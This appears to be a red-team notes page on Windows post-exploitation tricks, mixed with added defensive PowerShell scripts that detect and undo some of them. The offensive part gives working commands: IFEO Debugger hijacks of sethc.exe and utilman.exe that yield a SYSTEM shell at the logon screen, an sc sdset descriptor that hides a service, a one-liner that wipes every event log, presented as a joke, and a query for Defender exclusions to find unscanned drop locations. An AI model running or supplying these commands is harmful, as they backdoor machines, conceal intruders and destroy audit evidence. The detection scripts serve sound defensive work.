Windows Mischief
Ways to hide processes on Windows
Here are some of my ideas for hiding processes on a Windows system.
Registry Hijacks
Subvert sticky keys
Press Shift five times at an RDP login screen (this only works when Network Level Authentication is off; with NLA the logon screen is never shown to an unauthenticated client). The IFEO Debugger value makes the SCM-spawned sethc.exe turn into a SYSTEM cmd.exe:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
Subvert utility manager
Press Win+U at an RDP login screen:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
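Both hijacks above are the same primitive: a Debugger value under Image File Execution Options for a binary the logon screen can launch. The script below is an added example (not from the original post) that enumerates every IFEO Debugger on the box, flags the accessibility binaries, and removes the flagged entries. The list of accessibility binaries and the function names are my own choices; run it from an elevated PowerShell prompt.

```powershell
# Added example: audit and clean Image File Execution Options (IFEO) Debugger hijacks.
# Not part of the original post; the accessibility list below is an assumption of
# which binaries are reachable from the logon screen.
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$accessibility = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
                 'magnify.exe', 'displayswitch.exe', 'atbroker.exe'

function Get-IfeoDebugger {
    # Every subkey is an image name; only those with a Debugger value are interesting
    Get-ChildItem -Path $ifeo -ErrorAction SilentlyContinue | ForEach-Object {
        $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) {
            [pscustomobject]@{
                Image      = $_.PSChildName
                Debugger   = $dbg
                Suspicious = ($accessibility -contains $_.PSChildName.ToLower())
            }
        }
    }
}

function Remove-IfeoDebugger {
    param([Parameter(Mandatory)][string]$Image)
    $key = Join-Path $ifeo $Image
    if (-not (Test-Path $key)) { return }
    Remove-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue
    # Drop the key entirely if the Debugger value was the only thing in it
    $k = Get-Item -Path $key
    if ($k.ValueCount -eq 0 -and $k.SubKeyCount -eq 0) { Remove-Item -Path $key }
}

# Report everything, then strip only the accessibility-binary hijacks
Get-IfeoDebugger | Format-Table -AutoSize
Get-IfeoDebugger | Where-Object Suspicious | ForEach-Object { Remove-IfeoDebugger -Image $_.Image }
```

A Debugger value on a non-accessibility image is not automatically malicious (developer tooling such as a JIT debugger uses the same mechanism), which is why the script only auto-removes the flagged ones. The audit is a snapshot; for continuous coverage, watch registry value-set events (Sysmon Event ID 13) on that key path.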
Services
Hide a service
ref: https://www.sans.org/blog/red-team-tactics-hiding-windows-services/
Hide (the deny ACEs remove SERVICE_CHANGE_CONFIG, SERVICE_QUERY_STATUS, SERVICE_STOP, SERVICE_PAUSE_CONTINUE and DELETE from Interactive Users, Service logons and Administrators, so sc query, services.msc and Get-Service no longer list the service; SYSTEM keeps full access and the key under HKLM\SYSTEM\CurrentControlSet\Services stays visible. The full path to sc.exe is needed because PowerShell aliases sc to Set-Content):
$env:SystemRoot\System32\sc.exe sdset HideMe "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
Unhide (restores a standard descriptor: Administrators full control, SYSTEM the usual start/stop/query rights, Interactive and Service users read/query only):
$env:SystemRoot\System32\sc.exe sdset HideMe "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
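The flip side of the hide trick is finding services that have been hidden this way. The script below is an added example (not from the SANS post or the original page): it diffs the service keys in the registry against what the SCM is willing to enumerate, then decodes the SDDL of each missing service and prints its deny ACEs. Function names are my own; run it elevated.

```powershell
# Added example: detect services hidden via a deny-heavy DACL.
# Not from the original page; assumes an elevated PowerShell session.
$scexe = Join-Path $env:SystemRoot 'System32\sc.exe'   # 'sc' alone is Set-Content in PowerShell

function Get-HiddenServiceCandidate {
    # Every service has a key here regardless of its DACL. Keep only Win32 services
    # (Type has 0x10 own-process or 0x20 shared-process set); drivers are skipped.
    $regNames = Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' | Where-Object {
        $t = (Get-ItemProperty -Path $_.PSPath -Name Type -ErrorAction SilentlyContinue).Type
        $t -band 0x30
    } | ForEach-Object { $_.PSChildName }

    # Get-Service uses EnumServicesStatusEx, which silently drops services whose
    # SERVICE_QUERY_STATUS has been denied to the caller
    $scmNames = (Get-Service).Name
    $regNames | Where-Object { $scmNames -notcontains $_ }
}

function Get-ServiceDenyAce {
    param([Parameter(Mandatory)][string]$Name)
    # sdshow only needs READ_CONTROL, which the hide descriptor still grants to admins
    $line = & $scexe sdshow $Name 2>$null | Where-Object { $_ -match '^\s*D:' } | Select-Object -First 1
    if (-not $line) { return }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($line.Trim())
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne 'AccessDenied') { continue }
        $who = try { $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
               catch { $ace.SecurityIdentifier.Value }
        [pscustomobject]@{
            Service   = $Name
            Principal = $who
            Mask      = ('0x{0:X}' -f $ace.AccessMask)
        }
    }
}

# Anything that shows up here with deny ACEs for Administrators deserves a closer look
Get-HiddenServiceCandidate | ForEach-Object { Get-ServiceDenyAce -Name $_ } | Format-Table -AutoSize
```

Stale registry keys from uninstalled software will also appear in the candidate list, but they will have no descriptor to decode and so produce no deny ACE rows. A service whose DACL denies anything to BUILTIN\Administrators is the signature of the trick above; a normal service never has deny entries at all.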
Add a network share to the system PATH (so unqualified commands resolve from a share you control)
Persistence
Rename Startup Folder
- appdomain hijack of server admin utility
- https://www.trustedsec.com/blog/bits-persistence-for-script-kiddies/
Trolls
- change the keyboard layout to UK or DE
- Clear logs every few minutes, you know, for disk space reasons (be aware that clearing writes its own trace: Event ID 1102 in the Security log and 104 in the System log for the others). Written for an interactive cmd prompt; in a batch file double the percent signs:
for /F "tokens=*" %i in ('wevtutil.exe el') DO wevtutil.exe cl "%i"
Lock the workstation:
rundll32.exe user32.dll,LockWorkStation
Blank the wallpaper and turn the desktop background red (takes effect at the next logon):
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallPaper /t REG_SZ /d " " /f
reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v Background /t REG_SZ /d "255 0 0" /f
Not a troll, but worth running first: list the Defender exclusions, since anything dropped under an excluded path or with an excluded extension is never scanned (recent builds only show these to administrators):
$WDAVprefs = Get-MpPreference; $WDAVprefs.ExclusionExtension; $WDAVprefs.ExclusionPath